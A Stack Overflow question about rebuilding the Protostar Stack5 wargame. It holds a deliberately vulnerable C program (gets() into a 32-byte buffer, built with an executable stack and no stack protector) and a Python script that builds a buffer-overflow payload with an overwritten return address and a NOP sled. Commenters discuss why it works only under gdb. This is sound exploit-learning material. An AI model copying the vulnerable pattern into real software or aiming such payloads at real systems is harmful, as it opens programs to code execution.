0

Hello guys i want to create a similar file like Stack5 in protostar The only problem is that when i execute a shellcode , or just \xCC it only works in gdb.

The source code 

#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
#include<string.h>

int main(int argc, char ** argv)
{
  char container[32];
  gets(container);
}

the command used to build the executable 

gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -m32  -g binary1.c -o binary1

for example a \x90 interrupt

import struct
pad="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
eip=struct.pack("I",0xffffd6a0+4) 
payload="\x90"*12+"\xCC"*4+"\x90"*12
print pad+eip+payload

all the results i get are only segmentation fault ( dump)

Picture here for demonstration Image for comparison

Employed Russian
  • 199,314
  • 34
  • 295
  • 362
MihaiDamian
  • 1
  • 3
  • working on ubuntu x64 if it helps – MihaiDamian May 02 '18 at 21:22
  • Your source code would never compile. You'll get better answers if you show *actual* code. Also, where did you get the value `0xffffd6a0` from? – Employed Russian May 03 '18 at 00:26
  • @EmployedRussian Hello, ty for your answer. I got the address from: I put a breakpoint on ret, then si, then get the address of $esp register. Secondly, why do you say the code will never compile? (I will upload the executable shortly ) – MihaiDamian May 03 '18 at 03:50
  • It will not compile because the code has not any function (e.g. int main() {...}). Also, as @EmployedRussian said, where did you get the value 0xffffd6a0 from? Because GDB could use these address for usability. Normally with ASLR you will not know these address. You should find a ROP gadget to execute your payload. – sinkmanu May 03 '18 at 09:09
  • Sorry I copied badly the main. Edited. – MihaiDamian May 03 '18 at 09:19
  • @sinkmanu ty for the 2 suggestions – MihaiDamian May 03 '18 at 09:21
  • @sinkmanu: in this wargame, [there is no ASLR nor NX](https://exploit-exercises.com/protostar/) (but it may be enabled in OP's virtual machine). This address found by OP may be wrong because of the offset induced by the system when running the binary inside or outside the debugger, environment variables and argument being placed _before_ the stack (in higher addresses) in process' memory. I would recommend to use a bigger nopsled, no need of ROP chain in this case. – swapgs May 06 '18 at 16:24
  • Possible duplicate of [Buffer overflow works in gdb but not without it](https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it) – swapgs May 06 '18 at 16:24
  • @swapgs ty for the information and the link for the duplicate, really usefull – MihaiDamian May 09 '18 at 07:41

0 Answers0